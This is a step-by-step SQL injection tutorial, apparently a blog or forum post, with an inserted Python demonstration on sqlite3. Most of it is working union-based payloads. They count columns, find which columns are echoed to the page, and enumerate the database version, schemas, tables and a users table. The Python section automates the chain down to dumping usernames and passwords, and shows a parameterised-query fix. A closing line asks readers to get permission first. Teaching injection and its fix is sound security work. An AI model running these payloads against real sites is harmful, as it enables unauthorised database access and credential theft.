Initiating SQL Attack

One of the first steps in attacking a site whose id parameter is injectable is to learn the structure of the query and the database behind it. Start by appending a simple order by clause to the URL like so:

http://www.somesite.com/default.php?id=1 order by 1


If this request returns a normal page rather than an error, increment the number after order by (by 1, or by a larger step if you prefer) until an error is returned. The last value that did not produce an error is the number of columns in the SELECT statement the page runs; the error appears because you asked it to sort by a column position that does not exist in that query.

Once the column count is known, establish which of those columns are actually displayed on the page. Do so by appending a union select with the same number of columns to the end of the URL:

http://www.somesite.com/default.php?id=-1 union select 1,2,3,4,5,6

Take a close look at this statement. It assumes that you discovered six columns in the previous step; if more or fewer were found, adjust the list of numbers after select to match, because a union fails unless both sides return the same number of columns. Also note the hyphen after the = sign and before the 1: id=-1 matches no real row, so the only row the page has to render is the one your union select supplies.

When the page renders, some of the placeholder numbers will appear in it. Each number you can see identifies a column whose value is echoed into the page, and you can now replace that number with a more refined SQL expression to read its result.

You can now start doing some interesting tasks. Let's begin by identifying the database version in use. To do this, use @@version (MySQL and Microsoft SQL Server) or version() (MySQL and PostgreSQL) in place of one of the columns that is echoed to the page. In the examples that follow, column 3 is the one displayed.

http://www.somesite.com/default.php?id=-1 union select 1,2,@@version,4,5,6


The version string will appear in the page where the 3 was displayed before. Its content determines the next stage of the attack, since the system tables and functions used below differ between database products. For the rest of this example, assume the version returned is the one we expect.


NOTE:- This example assumes that the database in use is MySQL and that the version is at least 5.0, which is when the information_schema views used below were introduced. If another version or brand of database is in use, tailor the attack to that environment.


With the version information checking out, you can do something even more interesting: obtain a list of the databases present on the server by executing the following. The trailing -- - turns the remainder of the original query into a comment so it cannot interfere with yours (MySQL requires whitespace after --, and the extra hyphen keeps that space from being dropped from the URL):


http://www.somesite.com/default.php?id=-1 union select 1,2,group_concat(schema_name),4,5,6 from information_schema.schemata-- -


To determine the current database:

http://www.somesite.com/default.php?id=-1 union select 1,2,concat(database()),4,5,6-- -


To get the current user:

http://www.somesite.com/default.php?id=-1 union select 1,2,concat(user()),4,5,6-- -


To get the tables:

http://www.somesite.com/default.php?id=-1 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()-- -


With the tables listed, you will target the users table. The same information_schema approach lists its columns; note that this query reads column_name from information_schema.columns and filters on the table name, rather than repeating the table listing above:

http://www.somesite.com/default.php?id=-1 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_schema=database() and table_name='users'-- -
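The whole procedure above, from counting columns with order by through to reading the users table, as an added example that is not part of the original post. It uses Python's built-in sqlite3 module in place of MySQL so it runs offline, so the schema enumeration uses SQLite's sqlite_master and pragma_table_info instead of information_schema, sqlite_version() instead of @@version, and || instead of MySQL's 0x3a concatenation. The products and users tables, their rows, and the vulnerable_lookup function that mimics default.php are all constructed for this example; the final safe_lookup shows the parameterised query that defeats every payload in it.

```python
import sqlite3

# Constructed sample schema and data (not from the original page): a six-column
# products table looked up by id, and a users table worth extracting.
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, description TEXT,
                       price TEXT, sku TEXT, vendor TEXT);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO products VALUES (1, 'Widget', 'A widget', '9.99', 'W-1', 'ACME');
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
"""

QUERY = "SELECT id, name, description, price, sku, vendor FROM products WHERE id="


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param):
    """Mimics default.php?id=...: the parameter is pasted straight into the SQL.
    Returns None where the real page would show a database error."""
    try:
        return conn.execute(QUERY + id_param).fetchall()
    except sqlite3.OperationalError:
        return None


def count_columns(conn, max_cols=20):
    """ORDER BY n probing: the largest n that does not error is the column count."""
    found = 0
    for n in range(1, max_cols + 1):
        if vulnerable_lookup(conn, f"1 ORDER BY {n}") is None:
            break
        found = n
    return found


def union_probe(conn, ncols):
    """id=-1 UNION SELECT 1,2,...,n: no real row matches -1, so the only row
    rendered is ours, and the numbers that show up mark the displayed columns."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    return vulnerable_lookup(conn, f"-1 UNION SELECT {markers}")


def inject(conn, ncols, expr, tail=""):
    """Replace column 3 (the slot assumed to be echoed) with an expression,
    optionally followed by a FROM/WHERE tail, and return what that slot shows."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[2] = expr
    rows = vulnerable_lookup(conn, f"-1 UNION SELECT {','.join(cols)} {tail}")
    return rows[0][2] if rows else None


def safe_lookup(conn, id_param):
    """The fix: a parameterised query. The payload is bound as a value and is
    never parsed as SQL, so the UNION never reaches the database engine."""
    return conn.execute(QUERY + "?", (id_param,)).fetchall()


if __name__ == "__main__":
    db = open_db()
    n = count_columns(db)                       # 6, like the page's examples
    print("columns:", n)
    print("union probe:", union_probe(db, n))   # (1, 2, 3, 4, 5, 6)
    print("version:", inject(db, n, "sqlite_version()"))
    print("tables:", inject(db, n, "group_concat(name)",
                            "FROM sqlite_master WHERE type='table'"))
    print("users columns:", inject(db, n, "group_concat(name)",
                                   "FROM pragma_table_info('users')"))
    print("credentials:", inject(db, n, "group_concat(username || ':' || password)",
                                 "FROM users"))
    print("safe lookup with payload:", safe_lookup(db, "-1 UNION SELECT 1,2,3,4,5,6"))
```

The three queries against sqlite_master, pragma_table_info and users correspond to the page's information_schema.schemata/tables, information_schema.columns and (the natural next step) a select from the users table itself. Running the same payloads through safe_lookup returns an empty result every time, which is the check to apply when verifying a fix.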


You can work through all of the commands above against a vulnerable site to get practical experience, but we do not provide any website to try them on. You must have explicit permission from the site's owner before applying these SQL injection commands, and you should report any weaknesses you find to the webmaster of that site.
